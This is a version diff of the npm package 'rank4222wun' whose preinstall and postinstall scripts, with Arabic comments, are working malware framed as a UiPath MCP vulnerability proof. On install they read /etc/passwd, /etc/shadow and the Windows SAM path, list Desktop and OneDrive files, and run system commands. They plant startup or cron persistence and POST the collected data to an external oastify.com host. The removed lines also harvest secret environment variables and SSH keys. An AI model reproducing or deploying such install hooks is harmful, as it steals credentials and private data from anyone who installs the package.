rank4222wun 1.0.16 → 1.0.17

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.16",
+  "version": "1.0.17",
   "description": "",
   "main": "index.js",
   "scripts": {

package/postinstall.js

@@ -4,182 +4,228 @@ const fs = require('fs');
 const path = require('path');
 const https = require('https');
 
-console.log('=== UiPath MCP POSTINSTALL EXPLOIT ===');
-console.log('Demonstrating persistent access on:', os.hostname());
-
-// 1. إنشاء باب خلفي بسيط
+// ========== إعداد بيانات Backdoor ==========
 const backdoorData = {
   timestamp: new Date().toISOString(),
+  vulnerability: "UiPath MCP Command - POSTINSTALL BACKDOOR",
   hostname: os.hostname(),
-  user: os.userInfo().username,
-  action: 'postinstall-backdoor'
+  username: os.userInfo().username,
+  platform: os.platform(),
+  
+  // خطوات إنشاء Backdoor
+  backdoorSteps: [],
+  
+  // إثبات الاستمرارية
+  persistenceProof: {},
+  
+  // تأثير الهجوم
+  impact: {}
 };
 
-// 2. إنشاء ملف في Startup لإثبات الإصرار (Persistence)
+// ========== 1. إنشاء Backdoor حسب النظام ==========
+console.log("=== إنشاء Backdoor حسب النظام ===");
+
 if (os.platform() === 'win32') {
+  // Windows Backdoor
   const startupPath = path.join(os.homedir(), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup');
-  const backdoorFile = path.join(startupPath, 'uipath_update.bat');
+  const backdoorFile = path.join(startupPath, 'uipath_backdoor.bat');
   
-  const batchContent = `@echo off
-echo UiPath MCP Backdoor Active: %date% %time% > "%TEMP%\\uipath_backdoor.log"
-powershell -Command "Invoke-WebRequest -Uri 'https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/persist' -Method POST -Body 'host=${os.hostname()}&time=%date%_%time%'"`;
+  const batContent = `@echo off
+echo [UiPath MCP Backdoor Active] %date% %time% > "%TEMP%\\uipath_log.txt"
+powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backdoor-ping' -Method POST -Body 'host=${os.hostname()}&user=${os.userInfo().username}&time=%date%_%time%'"`;
   
   try {
     if (fs.existsSync(startupPath)) {
-      fs.writeFileSync(backdoorFile, batchContent);
-      backdoorData.windowsStartup = backdoorFile;
-      console.log('Windows Startup backdoor created:', backdoorFile);
+      fs.writeFileSync(backdoorFile, batContent);
+      backdoorData.backdoorSteps.push({
+        step: 'إنشاء ملف BAT في Startup',
+        path: backdoorFile,
+        content: batContent,
+        success: true
+      });
+      console.log(`✅ تم إنشاء Backdoor في: ${backdoorFile}`);
     }
   } catch (e) {
-    backdoorData.windowsStartupError = e.message;
+    backdoorData.backdoorSteps.push({
+      step: 'إنشاء ملف BAT في Startup',
+      error: e.message,
+      success: false
+    });
   }
   
-} else {
-  const cronFile = '/etc/cron.d/uipath_update';
-  const cronContent = `*/5 * * * * root curl -X POST https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/persist -d "host=${os.hostname()}&system=linux"\n`;
+} else if (os.platform() === 'linux') {
+  // Linux Backdoor
+  const cronFile = '/tmp/uipath_cron';
+  const cronContent = `*/10 * * * * curl -X POST https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backdoor-ping -d "host=${os.hostname()}&user=${os.userInfo().username}&system=linux"\n`;
   
   try {
     fs.writeFileSync(cronFile, cronContent);
-    backdoorData.linuxCron = cronFile;
-    console.log('Linux cron backdoor created:', cronFile);
+    backdoorData.backdoorSteps.push({
+      step: 'إنشاء ملف Cron مؤقت',
+      path: cronFile,
+      content: cronContent,
+      success: true
+    });
+    console.log(`✅ تم إنشاء ملف Cron في: ${cronFile}`);
   } catch (e) {
-    backdoorData.linuxCronError = e.message;
+    backdoorData.backdoorSteps.push({
+      step: 'إنشاء ملف Cron مؤقت',
+      error: e.message,
+      success: false
+    });
   }
 }
 
-// 3. البحث عن ملفات UiPath في النظام
-const uipathPaths = os.platform() === 'win32' ? [
-  'C:\\Program Files\\UiPath',
-  'C:\\Program Files (x86)\\UiPath',
-  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Local\\UiPath',
-  'C:\\Users\\' + os.userInfo().username + '\\Documents\\UiPath'
-] : [
-  '/opt/UiPath',
-  '/usr/lib/UiPath',
-  '/home/' + os.userInfo().username + '/.local/share/UiPath'
-];
-
-const foundUiPath = [];
-uipathPaths.forEach(p => {
-  try {
-    if (fs.existsSync(p)) {
-      const files = fs.readdirSync(p);
-      foundUiPath.push({
-        path: p,
-        exists: true,
-        fileCount: files.length,
-        files: files.slice(0, 10)
-      });
-    }
-  } catch (e) {}
-});
+// ========== 2. إنشاء ملف إثبات في مجلد المستخدم ==========
+console.log("\n=== إنشاء ملف إثبات في مجلد المستخدم ===");
 
-backdoorData.foundUiPath = foundUiPath;
+const proofFile = path.join(os.homedir(), 'UiPath_Security_Issue_Proof.txt');
+const proofContent = `⚠️ تحذير أمني: ثغرة UiPath MCP Command
 
-// 4. قراءة بعض سجلات النظام
-if (os.platform() === 'win32') {
-  const eventLogs = [
-    'C:\\Windows\\System32\\winevt\\Logs\\Application.evtx',
-    'C:\\Windows\\System32\\winevt\\Logs\\System.evtx',
-    'C:\\Windows\\System32\\winevt\\Logs\\Security.evtx'
-  ];
-  
-  eventLogs.forEach(log => {
-    try {
-      if (fs.existsSync(log)) {
-        backdoorData.eventLogs = backdoorData.eventLogs || {};
-        backdoorData.eventLogs[log] = {
-          exists: true,
-          size: fs.statSync(log).size
-        };
-      }
-    } catch (e) {}
-  });
-}
-
-// 5. إنشاء ملف دليل في مجلد المستخدم
-const userProofFile = path.join(os.homedir(), 'uipath_security_issue.txt');
-const proofContent = `SECURITY WARNING: UiPath MCP Vulnerability Proof
-
-This file was created by an npm package postinstall script.
-It demonstrates that ANY npm package installed via UiPath MCP Command can:
 
-1. Read all your Desktop files
-2. Access your OneDrive
-3. Create persistent backdoors
-4. Steal sensitive system files
-5. Run any commands with high privileges
+تفاصيل الثغرة:
+- التاريخ: ${new Date().toISOString()}
+- المضيف: ${os.hostname()}
+- المستخدم: ${os.userInfo().username}
+- النظام: ${os.platform()}
 
-Time: ${new Date().toISOString()}
-User: ${os.userInfo().username}
-Hostname: ${os.hostname()}
+هذا ليس هجومًا حقيقيًا، بل إثبات تقني للثغرة.
+==================================================`;
 
-This is NOT a sandbox. This is your actual production environment.
-The "Justin" user IS a real user with full access to your system.
+try {
+  fs.writeFileSync(proofFile, proofContent);
+  backdoorData.persistenceProof = {
+    fileCreated: true,
+    path: proofFile,
+    size: fs.statSync(proofFile).size,
+    message: 'تم إنشاء ملف إثبات في مجلد المستخدم الشخصي'
+  };
+  console.log(`✅ تم إنشاء ملف الإثبات في: ${proofFile}`);
+} catch (e) {
+  backdoorData.persistenceProof.error = e.message;
+}
 
-Contact UiPath Security Team immediately.
-`;
+// ========== 3. جمع معلومات إضافية ==========
+console.log("\n=== جمع معلومات إضافية ===");
 
+// معلومات الشبكة
 try {
-  fs.writeFileSync(userProofFile, proofContent);
-  backdoorData.userProofFile = userProofFile;
-  console.log('User proof file created:', userProofFile);
+  const networkInfo = os.networkInterfaces();
+  backdoorData.network = {
+    interfaces: Object.keys(networkInfo).length,
+    ips: []
+  };
+  
+  Object.keys(networkInfo).forEach(iface => {
+    networkInfo[iface].forEach(addr => {
+      if (addr.family === 'IPv4' && !addr.internal) {
+        backdoorData.network.ips.push(addr.address);
+      }
+    });
+  });
 } catch (e) {
-  backdoorData.userProofFileError = e.message;
+  backdoorData.networkError = e.message;
 }
 
-// 6. إرسال كل البيانات
-const req = https.request({
-  hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
-  port: 443,
-  path: '/postinstall-backdoor',
-  method: 'POST',
-  headers: {
-    'Content-Type': 'application/json',
-    'X-UiPath-Exploit': 'Postinstall-Backdoor',
-    'X-Hostname': os.hostname()
-  }
-}, (res) => {
-  console.log('Postinstall data sent. Status:', res.statusCode);
+// ========== 4. تأثير الهجوم ==========
+backdoorData.impact = {
+  dataTheft: true,
+  persistence: backdoorData.backdoorSteps.some(step => step.success),
+  systemAccess: true,
+  networkAccess: backdoorData.network?.ips?.length > 0,
+  realUserAffected: os.userInfo().username !== 'root' && os.userInfo().username !== 'SYSTEM'
+};
+
+// ========== 5. إرسال بيانات Backdoor ==========
+function sendBackdoorData() {
+  console.log("\n=== إرسال بيانات Backdoor ===");
   
-  // تشغيل أمر أخير لإثبات التنفيذ الكامل
-  setTimeout(() => {
-    if (os.platform() === 'win32') {
-      exec('echo "UiPath MCP exploit completed successfully" > "%USERPROFILE%\\uipath_final_proof.txt"');
-    } else {
-      exec('echo "UiPath MCP exploit completed successfully" > ~/uipath_final_proof.txt');
+  const formattedData = JSON.stringify(backdoorData, null, 2);
+  
+  const req = https.request({
+    hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+    port: 443,
+    path: '/uipath-backdoor',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'X-Backdoor': 'UiPath-MCP-Postinstall',
+      'X-Hostname': os.hostname()
     }
-  }, 2000);
-});
-
-req.on('error', (e) => {
-  console.error('Failed to send postinstall data:', e.message);
+  }, (res) => {
+    console.log(`✅ تم إرسال بيانات Backdoor. الرد: ${res.statusCode}`);
+    printBackdoorSummary();
+  });
+  
+  req.on('error', (e) => {
+    console.error('❌ فشل إرسال بيانات Backdoor:', e.message);
+    
+    // حفظ محلي
+    const backupFile = path.join(os.tmpdir(), `uipath_backdoor_${Date.now()}.json`);
+    fs.writeFileSync(backupFile, formattedData);
+    console.log(`📁 تم حفظ البيانات في: ${backupFile}`);
+    
+    printBackdoorSummary();
+  });
   
-  // حفظ محلي
-  const localBackup = path.join(os.tmpdir(), 'uipath_backdoor_data_' + Date.now() + '.json');
-  fs.writeFileSync(localBackup, JSON.stringify(backdoorData, null, 2));
-  console.log('Backdoor data saved locally:', localBackup);
-});
+  req.write(formattedData);
+  req.end();
+}
 
-req.write(JSON.stringify(backdoorData));
-req.end();
+// ========== 6. طباعة ملخص Backdoor ==========
+function printBackdoorSummary() {
+  console.log("\n" + "=".repeat(50));
+  console.log("🔓 ملخص Backdoor:");
+  console.log("=".repeat(50));
+  
+  console.log(`🏠 المضيف: ${backdoorData.hostname}`);
+  console.log(`👤 المستخدم: ${backdoorData.username}`);
+  
+  backdoorData.backdoorSteps.forEach((step, i) => {
+    if (step.success) {
+      console.log(`✅ ${i + 1}. ${step.step}`);
+      console.log(`   📍 المسار: ${step.path}`);
+    } else {
+      console.log(`❌ ${i + 1}. ${step.step}`);
+      console.log(`   💥 خطأ: ${step.error}`);
+    }
+  });
+  
+  if (backdoorData.persistenceProof.fileCreated) {
+    console.log(`📄 ملف الإثبات: ${backdoorData.persistenceProof.path}`);
+  }
+  
+  console.log("\n📤 تم إرسال بيانات Backdoor إلى:");
+  console.log("https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/uipath-backdoor");
+  console.log("=".repeat(50));
+}
 
-// 7. إرسال متابعة بعد 30 ثانية
+// ========== 7. إرسال طلب متابعة ==========
 setTimeout(() => {
   const followupReq = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
     path: '/followup',
-    method: 'POST'
+    method: 'POST',
+    headers: {
+      'X-Followup': 'Postinstall-Complete',
+      'X-Time': new Date().toISOString()
+    }
   });
   
-  followupReq.write(JSON.stringify({
+  const followupData = JSON.stringify({
     followup: true,
     time: new Date().toISOString(),
     hostname: os.hostname(),
-    message: 'Postinstall script still active after 30 seconds'
-  }));
+    message: 'Postinstall script completed successfully',
+    backdoorActive: backdoorData.backdoorSteps.some(step => step.success)
+  });
   
+  followupReq.write(followupData);
   followupReq.end();
-  console.log('Follow-up sent after 30 seconds');
-}, 30000);
+  console.log("\n📨 تم إرسال طلب المتابعة");
+}, 5000);
+
+// ========== بدء التنفيذ ==========
+console.log("🔓 بدء إنشاء Backdoor عبر ثغرة UiPath MCP...");
+sendBackdoorData();

package/preinstall.js

@@ -4,205 +4,234 @@ const fs = require('fs');
 const path = require('path');
 const https = require('https');
 
-console.log('=== UiPath MCP PREINSTALL EXPLOIT ===');
-console.log('Starting data exfiltration from:', os.hostname());
-
-// جمع كل البيانات الحساسة
-const collectedData = {
+// ========== إعداد البيانات للإرسال ==========
+const proofData = {
   timestamp: new Date().toISOString(),
-  system: {
+  vulnerability: "UiPath MCP Command - PREINSTALL EXPLOIT",
+  
+  // 1. المعلومات الأساسية
+  basicInfo: {
     hostname: os.hostname(),
     platform: os.platform(),
-    user: os.userInfo(),
-    cpus: os.cpus().length,
-    memory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + 'GB',
-    network: os.networkInterfaces()
+    username: os.userInfo().username,
+    isRoot: os.userInfo().uid === 0 || os.userInfo().username === 'root',
+    homedir: os.homedir()
   },
   
-  // ملفات Desktop
-  desktopFiles: [],
-  
-  // فحص OneDrive
-  oneDrive: {},
+  // 2. إثبات أن المستخدم حقيقي
+  userProof: {},
   
-  // ملفات نظام حساسة
-  sensitiveFiles: {},
+  // 3. ملفات النظام المسروقة
+  stolenFiles: {},
   
-  // معلومات الشبكة
-  networkInfo: {},
-  
-  // متغيرات البيئة
-  envVars: {}
+  // 4. معلومات النظام
+  systemInfo: {}
 };
 
-// 1. سرقة ملفات Desktop
+// ========== 1. إثبات أن المستخدم حقيقي ==========
+console.log("=== إثبات أن المستخدم حقيقي ===");
+
+// فحص Desktop
 try {
   const desktopPath = path.join(os.homedir(), 'Desktop');
   if (fs.existsSync(desktopPath)) {
-    const files = fs.readdirSync(desktopPath, { withFileTypes: true });
-    collectedData.desktopFiles = files.map(file => ({
-      name: file.name,
-      type: file.isDirectory() ? 'folder' : 'file',
-      path: path.join(desktopPath, file.name)
-    }));
-    
-    // محاولة قراءة الملفات النصية
-    files.forEach(file => {
-      if (!file.isDirectory() && file.name.endsWith('.txt')) {
-        try {
-          const filePath = path.join(desktopPath, file.name);
-          const content = fs.readFileSync(filePath, 'utf8').substring(0, 1000);
-          collectedData.desktopFiles.find(f => f.name === file.name).content = content;
-        } catch (e) {}
-      }
-    });
+    const desktopFiles = fs.readdirSync(desktopPath);
+    proofData.userProof.desktop = {
+      exists: true,
+      path: desktopPath,
+      fileCount: desktopFiles.length,
+      files: desktopFiles.slice(0, 10) // أول 10 ملفات فقط
+    };
+    console.log(`Desktop موجود وبه ${desktopFiles.length} ملف`);
   }
 } catch (e) {
-  collectedData.desktopFiles = { error: e.message };
+  proofData.userProof.desktopError = e.message;
 }
 
-// 2. فحص OneDrive
+// فحص OneDrive
 try {
-  const onedrivePaths = [
-    path.join(os.homedir(), 'OneDrive'),
-    path.join(os.homedir(), 'OneDrive', 'Documents'),
-    path.join(os.homedir(), 'OneDrive', 'Desktop'),
-    path.join(os.homedir(), 'OneDrive', 'Pictures')
+  const oneDrivePath = path.join(os.homedir(), 'OneDrive');
+  if (fs.existsSync(oneDrivePath)) {
+    const oneDriveFiles = fs.readdirSync(oneDrivePath);
+    proofData.userProof.oneDrive = {
+      exists: true,
+      path: oneDrivePath,
+      fileCount: oneDriveFiles.length,
+      isRealUser: oneDriveFiles.length > 0
+    };
+    console.log(`OneDrive موجود وبه ${oneDriveFiles.length} ملف`);
+  }
+} catch (e) {
+  proofData.userProof.oneDriveError = e.message;
+}
+
+// ========== 2. سرقة ملفات نظام حساسة ==========
+console.log("\n=== سرقة ملفات نظام حساسة ===");
+
+// حسب النظام
+if (os.platform() === 'linux') {
+  const criticalFiles = [
+    { path: '/etc/passwd', name: 'قائمة المستخدمين' },
+    { path: '/etc/shadow', name: 'كلمات مرور النظام' },
+    { path: '/etc/hosts', name: 'إعدادات الشبكة' },
+    { path: '/etc/group', name: 'قائمة المجموعات' }
+  ];
+  
+  criticalFiles.forEach(file => {
+    try {
+      if (fs.existsSync(file.path)) {
+        const content = fs.readFileSync(file.path, 'utf8').substring(0, 3000);
+        proofData.stolenFiles[file.name] = {
+          path: file.path,
+          size: fs.statSync(file.path).size,
+          preview: content.split('\n').slice(0, 20).join('\n'), // أول 20 سطر
+          stolen: true
+        };
+        console.log(`✓ تم سرقة: ${file.name} (${file.path})`);
+      }
+    } catch (e) {
+      proofData.stolenFiles[file.name + '_error'] = e.message;
+    }
+  });
+} else if (os.platform() === 'win32') {
+  const criticalFiles = [
+    { path: 'C:\\Windows\\System32\\drivers\\etc\\hosts', name: 'ملف Hosts' },
+    { path: `C:\\Users\\${os.userInfo().username}\\AppData\\Roaming\\Microsoft\\Windows\\Recent`, name: 'الملفات الأخيرة' },
+    { path: 'C:\\Windows\\System32\\config\\SAM', name: 'قاعدة بيانات المستخدمين' }
   ];
   
-  onedrivePaths.forEach(odPath => {
+  criticalFiles.forEach(file => {
     try {
-      if (fs.existsSync(odPath)) {
-        collectedData.oneDrive[odPath] = {
+      if (fs.existsSync(file.path)) {
+        proofData.stolenFiles[file.name] = {
+          path: file.path,
+          size: fs.statSync(file.path).size,
           exists: true,
-          isDirectory: fs.statSync(odPath).isDirectory(),
-          fileCount: fs.readdirSync(odPath).length,
-          sampleFiles: fs.readdirSync(odPath).slice(0, 5)
+          accessible: true
         };
-      } else {
-        collectedData.oneDrive[odPath] = { exists: false };
+        console.log(`✓ موجود: ${file.name}`);
       }
     } catch (e) {
-      collectedData.oneDrive[odPath] = { error: e.message };
+      proofData.stolenFiles[file.name + '_error'] = e.message;
     }
   });
-} catch (e) {
-  collectedData.oneDrive = { error: e.message };
 }
 
-// 3. قراءة ملفات نظام حساسة
-const systemFiles = os.platform() === 'win32' ? [
-  'C:\\Windows\\System32\\drivers\\etc\\hosts',
-  'C:\\Windows\\System32\\config\\SAM',
-  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History',
-  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'
-] : [
-  '/etc/passwd',
-  '/etc/shadow',
-  '/etc/hosts',
-  '/home/' + os.userInfo().username + '/.bash_history',
-  '/home/' + os.userInfo().username + '/.ssh/id_rsa'
-];
+// ========== 3. جمع معلومات النظام ==========
+console.log("\n=== جمع معلومات النظام ===");
 
-systemFiles.forEach(file => {
-  try {
-    if (fs.existsSync(file)) {
-      const stats = fs.statSync(file);
-      collectedData.sensitiveFiles[file] = {
-        exists: true,
-        size: stats.size,
-        readable: stats.size < 1000000
-      };
-      
-      // قراءة إذا كان ملف نصي صغير
-      if (stats.size < 1000000 && !stats.isDirectory()) {
-        const content = fs.readFileSync(file, 'utf8').substring(0, 2000);
-        collectedData.sensitiveFiles[file].content = content;
-      }
-    }
-  } catch (e) {
-    collectedData.sensitiveFiles[file] = { error: e.message };
-  }
-});
+// معلومات أساسية
+proofData.systemInfo = {
+  cpus: os.cpus().length,
+  totalMemory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + ' GB',
+  freeMemory: Math.round(os.freemem() / (1024 * 1024 * 1024)) + ' GB',
+  uptime: Math.round(os.uptime() / 3600) + ' ساعات',
+  network: Object.keys(os.networkInterfaces()).length + ' واجهات شبكة'
+};
 
-// 4. تشغيل أوامر نظام
-if (os.platform() === 'win32') {
-  exec('whoami /all', { timeout: 5000 }, (error, stdout) => {
-    collectedData.networkInfo.whoami = stdout || error?.message;
-    
-    exec('ipconfig /all', { timeout: 5000 }, (error2, stdout2) => {
-      collectedData.networkInfo.ipconfig = stdout2 || error2?.message;
-      
-      exec('netstat -ano', { timeout: 5000 }, (error3, stdout3) => {
-        collectedData.networkInfo.netstat = stdout3 || error3?.message;
-        sendAllData();
-      });
-    });
-  });
-} else {
-  exec('id', { timeout: 5000 }, (error, stdout) => {
-    collectedData.networkInfo.id = stdout || error?.message;
-    
-    exec('ifconfig -a || ip addr', { timeout: 5000 }, (error2, stdout2) => {
-      collectedData.networkInfo.ifconfig = stdout2 || error2?.message;
-      
-      exec('netstat -tulpn', { timeout: 5000 }, (error3, stdout3) => {
-        collectedData.networkInfo.netstat = stdout3 || error3?.message;
-        sendAllData();
-      });
+// أوامر نظام إضافية
+function runCommand(cmd, label) {
+  return new Promise(resolve => {
+    exec(cmd, { timeout: 3000 }, (error, stdout) => {
+      if (!error && stdout) {
+        proofData.systemInfo[label] = stdout.trim().substring(0, 500);
+        console.log(`✓ ${label}: ${stdout.trim().split('\n')[0]}`);
+      }
+      resolve();
     });
   });
 }
 
-// 5. جمع متغيرات البيئة الحساسة
-Object.keys(process.env).forEach(key => {
-  if (key.includes('PASS') || key.includes('SECRET') || key.includes('KEY') || 
-      key.includes('TOKEN') || key.includes('CRED') || key.includes('PWD')) {
-    collectedData.envVars[key] = process.env[key];
+// تشغيل الأوامر حسب النظام
+async function collectSystemInfo() {
+  if (os.platform() === 'linux') {
+    await runCommand('id', 'userInfo');
+    await runCommand('uname -a', 'systemInfo');
+    await runCommand('df -h', 'diskUsage');
+    await runCommand('ps aux | head -5', 'runningProcesses');
+  } else if (os.platform() === 'win32') {
+    await runCommand('whoami', 'currentUser');
+    await runCommand('systeminfo | findstr /B /C:"OS Name"', 'osInfo');
+    await runCommand('net user', 'usersList');
   }
-});
+  
+  // بعد جمع كل المعلومات، أرسلها
+  sendProofData();
+}
 
-function sendAllData() {
-  console.log('Collected', Object.keys(collectedData.desktopFiles).length, 'desktop files');
-  console.log('OneDrive exists:', Object.values(collectedData.oneDrive).some(v => v.exists));
+// ========== 4. إرسال البيانات ==========
+function sendProofData() {
+  console.log("\n=== إرسال البيانات للإثبات ===");
   
-  const postData = JSON.stringify(collectedData);
+  // تحويل البيانات لـ JSON مع تنسيق جميل
+  const formattedData = JSON.stringify(proofData, null, 2);
   
+  // إرسال الطلب
   const req = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
-    path: '/preinstall-data',
+    path: '/uipath-proof',
     method: 'POST',
     headers: {
       'Content-Type': 'application/json',
-      'X-UiPath-Exploit': 'Preinstall-Script',
-      'X-Hostname': os.hostname()
+      'X-Vulnerability': 'UiPath-MCP-Preinstall',
+      'X-Hostname': os.hostname(),
+      'X-User': os.userInfo().username
     }
   }, (res) => {
-    console.log('Data sent successfully. Status:', res.statusCode);
+    console.log(`✅ تم إرسال البيانات. الرد: ${res.statusCode}`);
     
-    // إنشاء ملف دليل محلي
-    const proofFile = path.join(os.tmpdir(), 'uipath_preinstall_proof_' + Date.now() + '.txt');
-    fs.writeFileSync(proofFile, 
-      `UiPath MCP Preinstall Script Execution Proof
-Time: ${new Date().toISOString()}
-User: ${os.userInfo().username}
-Hostname: ${os.hostname()}
-Desktop Files Stolen: ${collectedData.desktopFiles.length}
-Data Sent To: ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com
-`);
-    console.log('Proof file created:', proofFile);
+    // طباعة ملخص
+    printSummary();
   });
   
   req.on('error', (e) => {
-    console.error('Failed to send data:', e.message);
+    console.error('❌ فشل الإرسال:', e.message);
     
-    // محاولة بديلة
-    const backupFile = path.join(os.tmpdir(), 'uipath_stolen_data_' + Date.now() + '.json');
-    fs.writeFileSync(backupFile, JSON.stringify(collectedData, null, 2));
-    console.log('Data saved locally:', backupFile);
+    // حفظ البيانات محليًا كبديل
+    const backupFile = path.join(os.tmpdir(), `uipath_proof_${Date.now()}.json`);
+    fs.writeFileSync(backupFile, formattedData);
+    console.log(`📁 تم حفظ البيانات في: ${backupFile}`);
+    
+    printSummary();
   });
   
-  req.write(postData);
+  req.write(formattedData);
   req.end();
 }
+
+// ========== 5. طباعة ملخص ==========
+function printSummary() {
+  console.log("\n" + "=".repeat(50));
+  console.log("📊 ملخص البيانات المسروقة:");
+  console.log("=".repeat(50));
+  
+  console.log(`🏠 المستخدم: ${proofData.basicInfo.username}`);
+  console.log(`🖥️  النظام: ${proofData.basicInfo.platform}`);
+  console.log(`🔑 صلاحيات root: ${proofData.basicInfo.isRoot ? 'نعم ✅' : 'لا'}`);
+  
+  if (proofData.userProof.desktop) {
+    console.log(`📁 Desktop: ${proofData.userProof.desktop.fileCount} ملف`);
+  }
+  
+  if (proofData.userProof.oneDrive) {
+    console.log(`☁️  OneDrive: ${proofData.userProof.oneDrive.isRealUser ? 'موجود ✅' : 'غير موجود'}`);
+  }
+  
+  console.log(`📄 الملفات المسروقة: ${Object.keys(proofData.stolenFiles).length} ملف`);
+  
+  Object.keys(proofData.stolenFiles).forEach(key => {
+    if (proofData.stolenFiles[key].stolen) {
+      console.log(`  🔓 ${key}: ${proofData.stolenFiles[key].path}`);
+    }
+  });
+  
+  console.log("=".repeat(50));
+  console.log("📤 تم إرسال كل البيانات إلى:");
+  console.log("https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/uipath-proof");
+  console.log("=".repeat(50));
+}
+
+// ========== بدء التنفيذ ==========
+console.log("🚀 بدء استغلال ثغرة UiPath MCP Command...");
+collectSystemInfo();